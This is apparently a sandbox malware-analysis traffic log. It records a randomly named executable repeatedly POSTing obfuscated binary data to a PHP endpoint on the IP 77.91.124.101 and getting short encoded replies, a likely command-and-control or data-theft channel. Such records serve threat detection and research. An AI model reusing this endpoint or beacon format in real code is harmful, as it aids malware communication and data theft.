                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            1677.91.124.10180192.168.2.549728C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe
                                                            TimestampkBytes transferredDirectionData
                                                            Nov 21, 2023 04:47:36.833880901 CET205OUTPOST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1
                                                            Content-Type: application/octet-stream
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                            Host: 77.91.124.101
                                                            Content-Length: 2544
                                                            Expect: 100-continue
                                                            Connection: Keep-Alive
                                                            Nov 21, 2023 04:47:37.031764984 CET205INHTTP/1.1 100 Continue
                                                            Nov 21, 2023 04:47:37.032001972 CET208OUTData Raw: 57 59 5d 5e 5e 58 5a 59 5d 57 55 57 55 5d 57 55 50 53 58 48 56 5e 57 5c 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e
                                                            Data Ascii: WY]^^XZY]WUWU]WUPSXHV^W\^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\$)(Z(;=+_/76_#!^+>R$.>R002-8*\</.&G''^)+
                                                            Nov 21, 2023 04:47:37.236182928 CET208INHTTP/1.1 200 OK
                                                            Date: Tue, 21 Nov 2023 03:47:36 GMT
                                                            Server: Apache/2.4.41 (Ubuntu)
                                                            Content-Length: 4
                                                            Keep-Alive: timeout=5, max=100
                                                            Connection: Keep-Alive
                                                            Content-Type: text/html; charset=UTF-8
                                                            Data Raw: 33 58 5b 55
                                                            Data Ascii: 3X[U


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            1777.91.124.10180192.168.2.549729C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe
                                                            TimestampkBytes transferredDirectionData
                                                            Nov 21, 2023 04:47:37.555521011 CET209OUTPOST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1
                                                            Content-Type: application/octet-stream
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                            Host: 77.91.124.101
                                                            Content-Length: 2544
                                                            Expect: 100-continue
                                                            Connection: Keep-Alive
                                                            Nov 21, 2023 04:47:37.755810976 CET209INHTTP/1.1 100 Continue
                                                            Nov 21, 2023 04:47:37.756151915 CET212OUTData Raw: 52 5d 5d 5d 5b 59 5f 5b 5d 57 55 57 55 56 57 51 50 59 58 42 56 5e 57 58 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e
                                                            Data Ascii: R]]][Y_[]WUWUVWQPYXBV^WX^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\'^*5Z?))7;44=(*P'>.W$!,(9+,/.&G''^)
                                                            Nov 21, 2023 04:47:37.961127996 CET212INHTTP/1.1 200 OK
                                                            Date: Tue, 21 Nov 2023 03:47:37 GMT
                                                            Server: Apache/2.4.41 (Ubuntu)
                                                            Content-Length: 4
                                                            Keep-Alive: timeout=5, max=100
                                                            Connection: Keep-Alive
                                                            Content-Type: text/html; charset=UTF-8
                                                            Data Raw: 33 58 5b 55
                                                            Data Ascii: 3X[U


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            17192.168.2.54972977.91.124.10180C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe
                                                            TimestampkBytes transferredDirectionData
                                                            Nov 21, 2023 04:47:37.555521011 CET209OUTPOST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1
                                                            Content-Type: application/octet-stream
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                            Host: 77.91.124.101
                                                            Content-Length: 2544
                                                            Expect: 100-continue
                                                            Connection: Keep-Alive
                                                            Nov 21, 2023 04:47:37.755810976 CET209INHTTP/1.1 100 Continue
                                                            Nov 21, 2023 04:47:37.756151915 CET212OUTData Raw: 52 5d 5d 5d 5b 59 5f 5b 5d 57 55 57 55 56 57 51 50 59 58 42 56 5e 57 58 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e
                                                            Data Ascii: R]]][Y_[]WUWUVWQPYXBV^WX^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\'^*5Z?))7;44=(*P'>.W$!,(9+,/.&G''^)
                                                            Nov 21, 2023 04:47:37.961127996 CET212INHTTP/1.1 200 OK
                                                            Date: Tue, 21 Nov 2023 03:47:37 GMT
                                                            Server: Apache/2.4.41 (Ubuntu)
                                                            Content-Length: 4
                                                            Keep-Alive: timeout=5, max=100
                                                            Connection: Keep-Alive
                                                            Content-Type: text/html; charset=UTF-8
                                                            Data Raw: 33 58 5b 55
                                                            Data Ascii: 3X[U


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            18192.168.2.54973077.91.124.10180C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe
                                                            TimestampkBytes transferredDirectionData
                                                            Nov 21, 2023 04:47:38.006661892 CET213OUTPOST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1
                                                            Content-Type: application/octet-stream
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                            Host: 77.91.124.101
                                                            Content-Length: 1408
                                                            Expect: 100-continue
                                                            Connection: Keep-Alive
                                                            Nov 21, 2023 04:47:38.204606056 CET214INHTTP/1.1 100 Continue
                                                            Nov 21, 2023 04:47:38.204896927 CET215OUTData Raw: 52 58 58 50 5e 5e 5a 5d 5d 57 55 57 55 5d 57 5a 50 5e 58 41 56 54 57 5c 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e
                                                            Data Ascii: RXXP^^Z]]WUWU]WZP^XAVTW\^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\$+(.+&U)'[.$6#*5+3.S$>&3.R..?+]/&G''^)+
                                                            Nov 21, 2023 04:47:38.409367085 CET218INHTTP/1.1 200 OK
                                                            Date: Tue, 21 Nov 2023 03:47:38 GMT
                                                            Server: Apache/2.4.41 (Ubuntu)
                                                            Vary: Accept-Encoding
                                                            Content-Length: 152
                                                            Keep-Alive: timeout=5, max=100
                                                            Connection: Keep-Alive
                                                            Content-Type: text/html; charset=UTF-8
                                                            Data Raw: 01 10 22 5b 32 2c 3f 03 37 55 3f 53 3c 2a 25 52 2d 07 3e 41 3f 33 22 07 25 2d 16 5f 27 39 3e 0b 3f 11 01 03 27 17 23 0e 23 50 23 05 2a 1a 21 5a 0c 1d 26 5b 21 5e 3f 1e 3f 3d 24 13 28 13 2c 5c 25 1f 27 17 3c 00 27 53 21 30 23 10 25 33 37 08 2c 01 25 5f 2d 01 31 1b 26 5a 21 01 37 07 23 5f 0c 14 27 19 22 31 0d 5b 23 30 22 56 23 37 33 01 37 27 33 53 24 2d 0e 1e 26 16 2d 1a 2b 16 2b 0d 32 0e 24 50 26 3a 01 1d 25 07 01 51 3c 2a 26 54 2a 0e 2b 48 02 36 5a 50
                                                            Data Ascii: "[2,?7U?S<*%R->A?3"%-_'9>?'##P#*!Z&[!^??=$(,\%'<'S!0#%37,%_-1&Z!7#_'"1[#0"V#737'3S$-&-++2$P&:%Q<*&T*+H6ZP


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            1877.91.124.10180192.168.2.549730C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe
                                                            TimestampkBytes transferredDirectionData
                                                            Nov 21, 2023 04:47:38.006661892 CET213OUTPOST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1
                                                            Content-Type: application/octet-stream
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                            Host: 77.91.124.101
                                                            Content-Length: 1408
                                                            Expect: 100-continue
                                                            Connection: Keep-Alive
                                                            Nov 21, 2023 04:47:38.204606056 CET214INHTTP/1.1 100 Continue
                                                            Nov 21, 2023 04:47:38.204896927 CET215OUTData Raw: 52 58 58 50 5e 5e 5a 5d 5d 57 55 57 55 5d 57 5a 50 5e 58 41 56 54 57 5c 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e
                                                            Data Ascii: RXXP^^Z]]WUWU]WZP^XAVTW\^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\$+(.+&U)'[.$6#*5+3.S$>&3.R..?+]/&G''^)+
                                                            Nov 21, 2023 04:47:38.409367085 CET218INHTTP/1.1 200 OK
                                                            Date: Tue, 21 Nov 2023 03:47:38 GMT
                                                            Server: Apache/2.4.41 (Ubuntu)
                                                            Vary: Accept-Encoding
                                                            Content-Length: 152
                                                            Keep-Alive: timeout=5, max=100
                                                            Connection: Keep-Alive
                                                            Content-Type: text/html; charset=UTF-8
                                                            Data Raw: 01 10 22 5b 32 2c 3f 03 37 55 3f 53 3c 2a 25 52 2d 07 3e 41 3f 33 22 07 25 2d 16 5f 27 39 3e 0b 3f 11 01 03 27 17 23 0e 23 50 23 05 2a 1a 21 5a 0c 1d 26 5b 21 5e 3f 1e 3f 3d 24 13 28 13 2c 5c 25 1f 27 17 3c 00 27 53 21 30 23 10 25 33 37 08 2c 01 25 5f 2d 01 31 1b 26 5a 21 01 37 07 23 5f 0c 14 27 19 22 31 0d 5b 23 30 22 56 23 37 33 01 37 27 33 53 24 2d 0e 1e 26 16 2d 1a 2b 16 2b 0d 32 0e 24 50 26 3a 01 1d 25 07 01 51 3c 2a 26 54 2a 0e 2b 48 02 36 5a 50
                                                            Data Ascii: "[2,?7U?S<*%R->A?3"%-_'9>?'##P#*!Z&[!^??=$(,\%'<'S!0#%37,%_-1&Z!7#_'"1[#0"V#737'3S$-&-++2$P&:%Q<*&T*+H6ZP


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            1977.91.124.10180192.168.2.549731C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe
                                                            TimestampkBytes transferredDirectionData
                                                            Nov 21, 2023 04:47:38.151434898 CET214OUTPOST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1
                                                            Content-Type: application/octet-stream
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                            Host: 77.91.124.101
                                                            Content-Length: 2544
                                                            Expect: 100-continue
                                                            Connection: Keep-Alive
                                                            Nov 21, 2023 04:47:38.349040985 CET215INHTTP/1.1 100 Continue
                                                            Nov 21, 2023 04:47:38.349267006 CET218OUTData Raw: 52 5a 58 59 5b 5c 5a 58 5d 57 55 57 55 5a 57 56 50 5d 58 45 56 5f 57 53 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e
                                                            Data Ascii: RZXY[\ZX]WUWUZWVP]XEV_WS^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\')5<)?;57=X(0=32R$3..]&?,#/&G''^)7
                                                            Nov 21, 2023 04:47:38.555543900 CET219INHTTP/1.1 200 OK
                                                            Date: Tue, 21 Nov 2023 03:47:38 GMT
                                                            Server: Apache/2.4.41 (Ubuntu)
                                                            Content-Length: 4
                                                            Keep-Alive: timeout=5, max=100
                                                            Connection: Keep-Alive
                                                            Content-Type: text/html; charset=UTF-8
                                                            Data Raw: 33 58 5b 55
                                                            Data Ascii: 3X[U


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            19192.168.2.54973177.91.124.10180C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe
                                                            TimestampkBytes transferredDirectionData
                                                            Nov 21, 2023 04:47:38.151434898 CET214OUTPOST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1
                                                            Content-Type: application/octet-stream
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                            Host: 77.91.124.101
                                                            Content-Length: 2544
                                                            Expect: 100-continue
                                                            Connection: Keep-Alive
                                                            Nov 21, 2023 04:47:38.349040985 CET215INHTTP/1.1 100 Continue
                                                            Nov 21, 2023 04:47:38.349267006 CET218OUTData Raw: 52 5a 58 59 5b 5c 5a 58 5d 57 55 57 55 5a 57 56 50 5d 58 45 56 5f 57 53 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e
                                                            Data Ascii: RZXY[\ZX]WUWUZWVP]XEV_WS^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\')5<)?;57=X(0=32R$3..]&?,#/&G''^)7
                                                            Nov 21, 2023 04:47:38.555543900 CET219INHTTP/1.1 200 OK
                                                            Date: Tue, 21 Nov 2023 03:47:38 GMT
                                                            Server: Apache/2.4.41 (Ubuntu)
                                                            Content-Length: 4
                                                            Keep-Alive: timeout=5, max=100
                                                            Connection: Keep-Alive
                                                            Content-Type: text/html; charset=UTF-8
                                                            Data Raw: 33 58 5b 55
                                                            Data Ascii: 3X[U


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            277.91.124.10180192.168.2.549714C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe
                                                            TimestampkBytes transferredDirectionData
                                                            Nov 21, 2023 04:47:27.412916899 CET150OUTPOST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1
                                                            Content-Type: application/octet-stream
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                            Host: 77.91.124.101
                                                            Content-Length: 2544
                                                            Expect: 100-continue
                                                            Nov 21, 2023 04:47:27.609544992 CET151INHTTP/1.1 100 Continue
                                                            Nov 21, 2023 04:47:27.609765053 CET153OUTData Raw: 57 5e 58 5a 5b 5c 5a 51 5d 57 55 57 55 5b 57 54 50 5e 58 40 56 51 57 53 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e
                                                            Data Ascii: W^XZ[\ZQ]WUWU[WTP^X@VQWS^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\')=8"*3$8$&Z#^(3!3=$V98&(,,&G''^)3
                                                            Nov 21, 2023 04:47:27.814687014 CET154INHTTP/1.1 200 OK
                                                            Date: Tue, 21 Nov 2023 03:47:27 GMT
                                                            Server: Apache/2.4.41 (Ubuntu)
                                                            Content-Length: 4
                                                            Content-Type: text/html; charset=UTF-8
                                                            Data Raw: 33 58 5b 55
                                                            Data Ascii: 3X[U


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            2192.168.2.54971477.91.124.10180C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe
                                                            TimestampkBytes transferredDirectionData
                                                            Nov 21, 2023 04:47:27.412916899 CET150OUTPOST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1
                                                            Content-Type: application/octet-stream
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                            Host: 77.91.124.101
                                                            Content-Length: 2544
                                                            Expect: 100-continue
                                                            Nov 21, 2023 04:47:27.609544992 CET151INHTTP/1.1 100 Continue
                                                            Nov 21, 2023 04:47:27.609765053 CET153OUTData Raw: 57 5e 58 5a 5b 5c 5a 51 5d 57 55 57 55 5b 57 54 50 5e 58 40 56 51 57 53 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e
                                                            Data Ascii: W^XZ[\ZQ]WUWU[WTP^X@VQWS^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\')=8"*3$8$&Z#^(3!3=$V98&(,,&G''^)3
                                                            Nov 21, 2023 04:47:27.814687014 CET154INHTTP/1.1 200 OK
                                                            Date: Tue, 21 Nov 2023 03:47:27 GMT
                                                            Server: Apache/2.4.41 (Ubuntu)
                                                            Content-Length: 4
                                                            Content-Type: text/html; charset=UTF-8
                                                            Data Raw: 33 58 5b 55
                                                            Data Ascii: 3X[U


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            20192.168.2.54973277.91.124.10180C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe
                                                            TimestampkBytes transferredDirectionData
                                                            Nov 21, 2023 04:47:38.877762079 CET220OUTPOST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1
                                                            Content-Type: application/octet-stream
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                            Host: 77.91.124.101
                                                            Content-Length: 2544
                                                            Expect: 100-continue
                                                            Nov 21, 2023 04:47:39.075643063 CET220INHTTP/1.1 100 Continue
                                                            Nov 21, 2023 04:47:39.075918913 CET223OUTData Raw: 57 5a 58 5e 5b 5e 5f 5e 5d 57 55 57 55 56 57 50 50 5f 58 41 56 52 57 5e 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e
                                                            Data Ascii: WZX^[^_^]WUWUVWPP_XAVRW^^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\'X>(1X=+=<8!4\&( =3>>P$31:>?7Y;&G''^)
                                                            Nov 21, 2023 04:47:39.280512094 CET223INHTTP/1.1 200 OK
                                                            Date: Tue, 21 Nov 2023 03:47:38 GMT
                                                            Server: Apache/2.4.41 (Ubuntu)
                                                            Content-Length: 4
                                                            Content-Type: text/html; charset=UTF-8
                                                            Data Raw: 33 58 5b 55
                                                            Data Ascii: 3X[U


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            2077.91.124.10180192.168.2.549732C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe
                                                            TimestampkBytes transferredDirectionData
                                                            Nov 21, 2023 04:47:38.877762079 CET220OUTPOST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1
                                                            Content-Type: application/octet-stream
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                            Host: 77.91.124.101
                                                            Content-Length: 2544
                                                            Expect: 100-continue
                                                            Nov 21, 2023 04:47:39.075643063 CET220INHTTP/1.1 100 Continue
                                                            Nov 21, 2023 04:47:39.075918913 CET223OUTData Raw: 57 5a 58 5e 5b 5e 5f 5e 5d 57 55 57 55 56 57 50 50 5f 58 41 56 52 57 5e 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e
                                                            Data Ascii: WZX^[^_^]WUWUVWPP_XAVRW^^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\'X>(1X=+=<8!4\&( =3>>P$31:>?7Y;&G''^)
                                                            Nov 21, 2023 04:47:39.280512094 CET223INHTTP/1.1 200 OK
                                                            Date: Tue, 21 Nov 2023 03:47:38 GMT
                                                            Server: Apache/2.4.41 (Ubuntu)
                                                            Content-Length: 4
                                                            Content-Type: text/html; charset=UTF-8
                                                            Data Raw: 33 58 5b 55
                                                            Data Ascii: 3X[U


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            21192.168.2.54973377.91.124.10180C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe
                                                            TimestampkBytes transferredDirectionData
                                                            Nov 21, 2023 04:47:39.598589897 CET224OUTPOST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1
                                                            Content-Type: application/octet-stream
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                            Host: 77.91.124.101
                                                            Content-Length: 2544
                                                            Expect: 100-continue
                                                            Connection: Keep-Alive
                                                            Nov 21, 2023 04:47:39.795681000 CET224INHTTP/1.1 100 Continue
                                                            Nov 21, 2023 04:47:39.795901060 CET227OUTData Raw: 57 59 58 5f 5b 59 5a 5b 5d 57 55 57 55 5d 57 54 50 5b 58 44 56 5f 57 53 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e
                                                            Data Ascii: WYX_[YZ[]WUWU]WTP[XDV_WS^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\'+(<*U)0#\8$#%+ 93>2'T9+*\>,']/&G''^)+
                                                            Nov 21, 2023 04:47:39.999308109 CET227INHTTP/1.1 200 OK
                                                            Date: Tue, 21 Nov 2023 03:47:39 GMT
                                                            Server: Apache/2.4.41 (Ubuntu)
                                                            Content-Length: 4
                                                            Keep-Alive: timeout=5, max=100
                                                            Connection: Keep-Alive
                                                            Content-Type: text/html; charset=UTF-8
                                                            Data Raw: 33 58 5b 55
                                                            Data Ascii: 3X[U


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            2177.91.124.10180192.168.2.549733C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe
                                                            TimestampkBytes transferredDirectionData
                                                            Nov 21, 2023 04:47:39.598589897 CET224OUTPOST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1
                                                            Content-Type: application/octet-stream
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                            Host: 77.91.124.101
                                                            Content-Length: 2544
                                                            Expect: 100-continue
                                                            Connection: Keep-Alive
                                                            Nov 21, 2023 04:47:39.795681000 CET224INHTTP/1.1 100 Continue
                                                            Nov 21, 2023 04:47:39.795901060 CET227OUTData Raw: 57 59 58 5f 5b 59 5a 5b 5d 57 55 57 55 5d 57 54 50 5b 58 44 56 5f 57 53 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e
